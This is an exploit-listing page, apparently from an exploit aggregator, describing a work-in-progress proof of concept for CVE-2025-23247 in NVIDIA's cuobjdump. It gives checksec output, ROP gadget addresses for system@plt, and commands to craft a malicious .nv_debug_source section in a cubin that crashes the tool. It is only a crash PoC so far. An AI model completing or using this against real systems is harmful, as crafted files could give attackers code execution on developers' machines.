## https://sploitus.com/exploit?id=5EE99A70-B3F0-564F-B4DB-51BABECCCB1D
# CVE-2025-23247
Epic Collab with @reubensammut :) as alaways :)
wip for CVE-2025-23247 . ATM just crash PoC which shows we control buffer and offset, so we got aaw.
Bug from https://talosintelligence.com/vulnerability_reports/TALOS-2025-2151
checksec ./cuobjdump
[*] '/home/vlad/cuobjdump'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x400000)
Anyways we get no PIE so
uint64_t system_plt = 0x401d90;
uint64_t pop_rdi_ret = 0x402d1b;
uint64_t ret_gadget = 0x402d1c; // Just a ret
Crashpoint

gcc -o modify_simple modify_simple.c
vlad@Vlad-PC:~$ ./modify_simple simple.cubin modified_simple2.cubin
Created modified_simple2.cubin with vulnerable .nv_debug_source section
Run: ./cuobjdump --dump-elf modified_simple2.cubin
And for the cuda kernel
nvcc -ptx simple.cu -o simple.ptx
nvcc -cubin simple.ptx -o simple.cubin --generate-line-info
or
nvcc -cubin simple.cu -o simple.cubin --generate-line-info